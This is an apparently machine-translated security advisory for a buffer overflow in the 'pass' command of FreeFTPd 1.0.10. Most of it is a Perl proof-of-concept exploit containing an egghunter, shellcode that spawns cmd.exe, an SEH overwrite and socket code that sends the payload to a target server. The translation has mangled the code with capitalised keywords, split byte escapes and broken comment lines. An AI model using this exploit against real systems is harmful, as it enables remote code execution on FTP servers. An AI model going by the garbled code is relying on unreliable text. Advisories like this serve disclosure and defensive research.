FreeFTPd 'pass' Command Buffer Overflow Vulnerability

Release date:
Updated on: 2013-08-22

Affected Systems:
FreeFTPd 1.0.10
Description:
--------------------------------------------------------------------------------
Bugtraq id: 61905

FreeFTPd is a free FTP + SSL/SFTP Server Based on WeOnlyDo FTP/SFTP.

FreeFTPd 1.0.10 has a buffer overflow vulnerability in the implementation of the 'pass' command. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.

<* Source: Wireghoul
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Usr/bin/perl
# FreeFTPd 1.0.10 anonymous-auth pass seh buffer overflow
# PoC by Wireghoul-www.justanotherhacker.com
# Date: 20130820
# Tested on: XPSP3
# Similar exploits:
# EDB 23079 1330 1339
# Greetz corelan, TecR0C, mr_me, jjkakakk

If (scalar (@ ARGV )! = 2) {"Usage $0 host port \ n"; exit ;}
Use IO: Socket: INET;
# Null byte in ppr forces a backwards short jump allowing 128 bytes
Shellcode max
# Thus we use an egghunter
My $ egghunter =
"\ X66 \ x81 \ xCA \ xFF \ x0F \ x42 \ x52 \ x6A \ x43 \ x58 \ xCD \ x2E \ x3C \ x05 \ x5A \ x74 \ xEF \ xB8 ".
"WRGL ".
"\ X8B \ xFA \ xAF \ x75 \ xEA \ xAF \ x75 \ xE7 \ xFF \ xE7 ";
# I have CT the max lenght for this is ~ 1024 bytes, didn't bother checking
# Spawn cmd.exe from msfpayload windows/exec dynamic cmd.exe R | msfencode-B
'\ X0a \ x0d'-t perl
My $ shell =
"\ Xd9 \ xeb \ xd9 \ x74 \ x24 \ xf4 \ x5e \ xbf \ xe0 \ xdd \ xfb \ x11 \ x33 \ xc9 ".
"\ Xb1 \ x32 \ x31 \ x7e \ x1a \ x83 \ xc6 \ x04 \ x03 \ x7e \ x16 \ xe2 \ x15 \ x21 ".
"\ X13 \ x98 \ xd5 \ xda \ xe4 \ xfb \ x5c \ x3f \ xd5 \ x29 \ x3a \ x4b \ x44 \ xfe ".
"\ X49 \ x19 \ x65 \ x75 \ x1f \ x8a \ xfe \ xfb \ xb7 \ xbd \ xb7 \ xb6 \ xe1 \ xf0 ".
"\ X48 \ x77 \ x2d \ x5e \ x8a \ x19 \ xd1 \ x9d \ xdf \ xf9 \ xe8 \ x6d \ x12 \ xfb ".
"\ X2d \ x93 \ xdd \ xa9 \ xe6 \ xdf \ x4c \ x5e \ x83 \ xa2 \ x4c \ x5f \ x43 \ xa9 ".
"\ Xed \ x27 \ xe6 \ x6e \ x99 \ x9d \ xe9 \ xbe \ x32 \ xa9 \ xa1 \ x26 \ x38 \ xf5 ".
"\ X11 \ x56 \ xed \ xe5 \ x6d \ x11 \ x9a \ xde \ x06 \ xa0 \ x4a \ x2f \ xe7 \ x92 ".
"\ Xb2 \ xfc \ xd6 \ x1a \ x3f \ xfc \ x1f \ x9c \ xa0 \ x8b \ x6b \ xde \ x5d \ x8c ".
"\ Xa8 \ x9c \ xb9 \ x19 \ x2c \ x06 \ x49 \ xb9 \ x94 \ xb6 \ x9e \ x5c \ x5f \ xb4 ".
"\ X6b \ x2a \ x07 \ xd9 \ x6a \ xff \ x3c \ xe5 \ xe7 \ xfe \ x92 \ x6f \ xb3 \ x24 ".
"\ X36 \ x2b \ x67 \ x44 \ x6f \ x91 \ xc6 \ x79 \ x6f \ x7d \ xb6 \ xdf \ xe4 \ x6c ".
"\ Xa3 \ x66 \ xa7 \ xfa \ x32 \ xea \ xd2 \ x42 \ x34 \ xf4 \ xdc \ xe4 \ x5d \ xc5 ".
"\ X57 \ x6b \ x19 \ xda \ xb2 \ xcf \ xd5 \ x90 \ x9e \ x66 \ x7e \ x7d \ x4b \ x3b ".
"\ Xe3 \ x7e \ xa6 \ x78 \ x1a \ xfd \ x42 \ x01 \ xd9 \ x1d \ x27 \ x04 \ xa5 \ x99 ".
"\ Xd4 \ x74 \ xb6 \ x4f \ xda \ x2b \ xb7 \ x45 \ xb9 \ xa6 \ x23 \ x48 \ x58 \ x41 ".
"\ Xc9 \ x94 ";
My $ egg = "user wrglwrgl $ shell \ r \ n ";
My $ usr = "USER anonymous \ r \ n"; # Must be an existing anonymous account
# I'm lazy, NOPs are fine by me
My $ pre = "PASS". "\ x90" x (797-length ($ egghunter). $ egghunter;
My $ seh1 = "\ x90 \ x90 \ xEB \ x80"; # nop, nop, jmp + 4
My $ seh2 = "\ xf0 \ x42 \ x41 \ x00"; # PPR from freeFTPDService.exe (only unsafe
SEH module), 0x004142f0
My $ pad = "X" x 209. "\ r \ n ";

My $ payload = $ pre. $ seh1. $ seh2. $ pad;

My $ sock = IO: Socket: INET-> new ("$ ARGV [0]: $ ARGV [1]") or die "Unable
Connect! \ N ";
My $ eggsock = IO: Socket: INET-> new ("$ ARGV [0]: $ ARGV [1]") or die "Unable
Connect! \ N ";
Print $ eggsock $ egg;
Sleep 1;
Print $ sock $ usr;
Sleep 1;
Print "Preparing exploit \ n ";
Sleep 1;
Print $ sock $ payload;
Print "Exploiting \ n ";
Sleep 3;
Print "Done \ n ";

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

FreeFTPd
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://freeftpd.com/